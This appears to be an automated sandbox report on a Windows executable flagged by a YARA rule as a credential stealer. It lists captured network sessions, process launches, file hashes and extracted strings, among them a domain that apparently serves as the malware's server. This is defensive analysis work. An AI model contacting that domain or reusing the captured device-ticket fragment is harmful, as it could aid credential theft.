c722bba77b8b4ffd<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAVFUWVpzrO59lUfdqP1pom4Pj87DaGIjISbNhFjjvA1kpZLERqwPF6V1XeU0oZxy7f42h/5iY8ypB8D7du/Ud6H0i7gIj4UwYrmaRkF/epC8Rx
2024-12-26 11:41:58 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 74 53 46 30 56 73 70 6c 4f 6b 43 41 34 6a 31 78 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 37 32 32 62 62 61 37 37 62 38 62 34 66 66 64 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: tSF0VsplOkCA4j1x.3Context: c722bba77b8b4ffd<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-26 11:41:58 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-26 11:41:58 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 4c 4a 2b 71 4f 49 46 6d 56 6b 69 69 4c 6b 79 6b 45 35 53 44 4c 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: LJ+qOIFmVkiiLkykE5SDLg.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.6	49987	20.198.119.84	443

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:42:28 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 66 76 75 53 52 43 4c 46 4c 6b 61 6b 79 73 57 53 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 64 30 64 63 36 30 63 38 39 38 38 63 63 66 39 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: fvuSRCLFLkakysWS.1Context: 3d0dc60c8988ccf9
2024-12-26 11:42:28 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-26 11:42:28 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 66 76 75 53 52 43 4c 46 4c 6b 61 6b 79 73 57 53 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 64 30 64 63 36 30 63 38 39 38 38 63 63 66 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 46 55 57 56 70 7a 72 4f 35 39 6c 55 66 64 71 50 31 70 6f 6d 34 50 6a 38 37 44 61 47 49 6a 49 53 62 4e 68 46 6a 6a 76 41 31 6b 70 5a 4c 45 52 71 77 50 46 36 56 31 58 65 55 30 6f 5a 78 79 37 66 34 32 68 2f 35 69 59 38 79 70 42 38 44 37 64 75 2f 55 64 36 48 30 69 37 67 49 6a 34 55 77 59 72 6d 61 52 6b 46 2f 65 70 43 38 52 78 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: fvuSRCLFLkakysWS.2Context: 3d0dc60c8988ccf9<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAVFUWVpzrO59lUfdqP1pom4Pj87DaGIjISbNhFjjvA1kpZLERqwPF6V1XeU0oZxy7f42h/5iY8ypB8D7du/Ud6H0i7gIj4UwYrmaRkF/epC8Rx
2024-12-26 11:42:28 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 66 76 75 53 52 43 4c 46 4c 6b 61 6b 79 73 57 53 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 64 30 64 63 36 30 63 38 39 38 38 63 63 66 39 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: fvuSRCLFLkakysWS.3Context: 3d0dc60c8988ccf9<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-26 11:42:28 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-26 11:42:28 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 76 2f 36 39 78 56 36 36 78 30 65 30 34 6d 63 36 58 47 4d 43 6e 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: v/69xV66x0e04mc6XGMCnA.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.6	50071	20.198.119.84	443

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:43:06 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 54 67 79 44 67 50 77 37 2f 45 32 38 71 78 4c 4c 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 38 36 35 61 39 64 33 66 61 34 36 33 34 37 30 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: TgyDgPw7/E28qxLL.1Context: f865a9d3fa463470
2024-12-26 11:43:06 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-26 11:43:06 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 54 67 79 44 67 50 77 37 2f 45 32 38 71 78 4c 4c 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 38 36 35 61 39 64 33 66 61 34 36 33 34 37 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 46 55 57 56 70 7a 72 4f 35 39 6c 55 66 64 71 50 31 70 6f 6d 34 50 6a 38 37 44 61 47 49 6a 49 53 62 4e 68 46 6a 6a 76 41 31 6b 70 5a 4c 45 52 71 77 50 46 36 56 31 58 65 55 30 6f 5a 78 79 37 66 34 32 68 2f 35 69 59 38 79 70 42 38 44 37 64 75 2f 55 64 36 48 30 69 37 67 49 6a 34 55 77 59 72 6d 61 52 6b 46 2f 65 70 43 38 52 78 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: TgyDgPw7/E28qxLL.2Context: f865a9d3fa463470<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAVFUWVpzrO59lUfdqP1pom4Pj87DaGIjISbNhFjjvA1kpZLERqwPF6V1XeU0oZxy7f42h/5iY8ypB8D7du/Ud6H0i7gIj4UwYrmaRkF/epC8Rx
2024-12-26 11:43:06 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 54 67 79 44 67 50 77 37 2f 45 32 38 71 78 4c 4c 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 38 36 35 61 39 64 33 66 61 34 36 33 34 37 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: TgyDgPw7/E28qxLL.3Context: f865a9d3fa463470<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-26 11:43:07 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-26 11:43:07 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 50 2f 47 4c 52 6b 6e 56 71 55 69 44 68 75 6d 2b 4e 78 42 76 33 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: P/GLRknVqUiDhum+NxBv3g.0Payload parsing failed.

Target ID:	0
Start time:	06:41:12
Start date:	26/12/2024
Path:	C:\Users\user\Desktop\TTsfmr1RWm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TTsfmr1RWm.exe"
Imagebase:	0x930000
File size:	2'955'776 bytes
MD5 hash:	A2E3E7417756B4B817F2FBCA4C98EC6E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2375404477.0000000001327000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2375508681.0000000001333000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2375441101.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:41:48
Start date:	26/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=TTsfmr1RWm.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Imagebase:	0x7ff66e660000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	06:41:49
Start date:	26/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=2052,i,2643484454984421268,17398489647533980506,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	06:41:52
Start date:	26/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=TTsfmr1RWm.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:41:52
Start date:	26/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1800 --field-trial-handle=1932,i,6243426754934364140,9618148067064436805,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	80.8%
Total number of Nodes:	479
Total number of Limit Nodes:	44

Executed Functions

Function 00942750 Relevance: 268.0, APIs: 3, Strings: 149, Instructions: 2041COMMON

Download Yara Rule

Strings

&, xrefs: 009429D4
|, xrefs: 00943423
?, xrefs: 00943F81
y, xrefs: 009434E9
&, xrefs: 00943C3A
r, xrefs: 00943D9A
_, xrefs: 00944633
8, xrefs: 00943937
j, xrefs: 00942F58
_, xrefs: 0094472F
3, xrefs: 00943BEA
/, xrefs: 00944001
\, xrefs: 00943614
-, xrefs: 00943FF1
_, xrefs: 00944469
Z, xrefs: 0094397F
L, xrefs: 00942A71
R, xrefs: 00943D8A
o, xrefs: 00943997
K, xrefs: 00944019
f, xrefs: 009427B6
:, xrefs: 00943BDA
W, xrefs: 00943C82
l, xrefs: 00943987
J, xrefs: 00943CDA
\, xrefs: 009441FF
d, xrefs: 009434B9
D, xrefs: 00944578
E, xrefs: 00942CB1
F, xrefs: 00942F20
e, xrefs: 00943CF2
m, xrefs: 00943F89
K, xrefs: 00943BE2
F, xrefs: 0094395F
A, xrefs: 00943C12
d, xrefs: 00942EF0
_, xrefs: 009441E7
, xrefs: 00943C6A
g, xrefs: 00943D02
^, xrefs: 00944471
], xrefs: 00944479
V, xrefs: 00943D7A
', xrefs: 00944041
1, xrefs: 00943FD1
_, xrefs: 00943C42
., xrefs: 00943B82
X, xrefs: 00943D4A
G, xrefs: 00943C02
D, xrefs: 0094456B
m, xrefs: 00943CB2
h, xrefs: 00942F68
a, xrefs: 0094295D
B, xrefs: 0094393F
^, xrefs: 0094463B
i, xrefs: 00943744
9, xrefs: 00943977
k, xrefs: 00943CE2
%, xrefs: 00943C4A
., xrefs: 00943C5A
{, xrefs: 00943D62
a, xrefs: 00943D12
=, xrefs: 009434D9
S, xrefs: 00943CA2
9, xrefs: 00943927
L, xrefs: 0094392F
], xrefs: 00944367
\, xrefs: 009439AF
7, xrefs: 00943FC1
y, xrefs: 00943D52
^, xrefs: 0094435F
), xrefs: 00944011
Y, xrefs: 00943C52
9, xrefs: 00943F91
\, xrefs: 00944481
_, xrefs: 009439A7
Q, xrefs: 00943C92
/, xrefs: 00943C9A
0, xrefs: 00943C1A
", xrefs: 00944059
;, xrefs: 00943FA1
;, xrefs: 00942F00
3, xrefs: 00943FE1
^, xrefs: 00944734
<, xrefs: 00942DA3
], xrefs: 00944739
/, xrefs: 00943B87
!, xrefs: 00944051
_, xrefs: 009435FC
e, xrefs: 00943C8A
=, xrefs: 00943F71
6, xrefs: 00942BE4
Y, xrefs: 0094281E
5, xrefs: 00943FB1
<, xrefs: 009434C9
}, xrefs: 00943D32
k, xrefs: 00942F60
D, xrefs: 0094396F
v, xrefs: 00943C7A
c, xrefs: 00943D22
A, xrefs: 00942F30
S, xrefs: 00943FC9
~, xrefs: 00943433
[, xrefs: 00943C62
\, xrefs: 0094436F
\, xrefs: 0094464B
/, xrefs: 00943C2A
l, xrefs: 00942F48
2, xrefs: 00942B1F
N, xrefs: 00943FE9
-, xrefs: 00943B7D
^, xrefs: 00942D94
u, xrefs: 00943D72
#, xrefs: 00944061
C, xrefs: 00943C22
\, xrefs: 0094473E
o, xrefs: 00943CC2
j, xrefs: 00943413
^, xrefs: 0094399F
], xrefs: 0094360C
+, xrefs: 00944021
O, xrefs: 00943D5A
n, xrefs: 00942F38
`, xrefs: 00943588
X, xrefs: 0094398F
E, xrefs: 00943BF2
q, xrefs: 00943D92
^, xrefs: 00943604
*, xrefs: 00942A6C
%, xrefs: 00944031
2, xrefs: 00943403
], xrefs: 009441F7
D, xrefs: 00944136
@, xrefs: 0094394F
=, xrefs: 00943C0A
_, xrefs: 00944357
<, xrefs: 0094336C
;, xrefs: 00943967
^, xrefs: 009441EF
%, xrefs: 00943957
i, xrefs: 00943CD2
w, xrefs: 00943D82
], xrefs: 00944643
1, xrefs: 00943947
U, xrefs: 00943C72
H, xrefs: 00942F10
s, xrefs: 00943DA2
], xrefs: 00943C32
?, xrefs: 00943076
~, xrefs: 00942D99

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID:
String ID: $!$"$#$%$%$%$&$&$'$)$*$+$-$-$.$.$/$/$/$/$0$1$1$2$2$3$3$5$6$7$8$9$9$9$:$;$;$;$<$<$<$=$=$=$?$?$@$A$A$B$C$D$D$D$D$E$E$F$F$G$H$J$K$K$L$L$N$O$Q$R$S$S$U$V$W$X$X$Y$Y$Z$[$\$\$\$\$\$\$\$]$]$]$]$]$]$]$^$^$^$^$^$^$^$^$_$_$_$_$_$_$_$_$`$a$a$c$d$d$e$e$f$g$h$i$i$j$j$k$k$l$l$m$m$n$o$o$q$r$s$u$v$w$y$y${$|$}$~$~
API String ID: 0-1985396431
Opcode ID: 983f93301a4f6dfabe556808b44e3e3cbc6a2be3941940dcbda9f03bfd963ec1
Instruction ID: 2cb50ed9ec15ad5d1eebb8eb1896810a58899888aaf6ea85464674902bf051d0
Opcode Fuzzy Hash: 983f93301a4f6dfabe556808b44e3e3cbc6a2be3941940dcbda9f03bfd963ec1
Instruction Fuzzy Hash: C813BA3150C7C08BD3359B3884847AFBFE1ABD6314F198E6DE4E987382D6B989458B53

Function 00952E6D Relevance: 47.0, APIs: 2, Strings: 24, Instructions: 1505COMMON

Download Yara Rule

Strings

_^]\, xrefs: 00952EA5
wdnf, xrefs: 00952F07
JOSP, xrefs: 00952F6F
s, xrefs: 00952FCA
CNF8, xrefs: 00952F3F
+A#C, xrefs: 00953D15
I, xrefs: 00953048
- $f, xrefs: 00953038
mindhandru.buzz, xrefs: 009533BD
rp, xrefs: 00953FF3
g}zh, xrefs: 00952F27
V], xrefs: 009531FA
9#', xrefs: 00953040
eN, xrefs: 009541BA
].n^, xrefs: 00952F57
Fm, xrefs: 009531F2
Q*RG, xrefs: 00952F5F
#E#G, xrefs: 00953D1C
~SS}, xrefs: 00952F37
=]=_, xrefs: 00953D0E
%", xrefs: 0095334A
8]pY, xrefs: 00952EFF
_^]\, xrefs: 00953695
R03!, xrefs: 00952F77

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
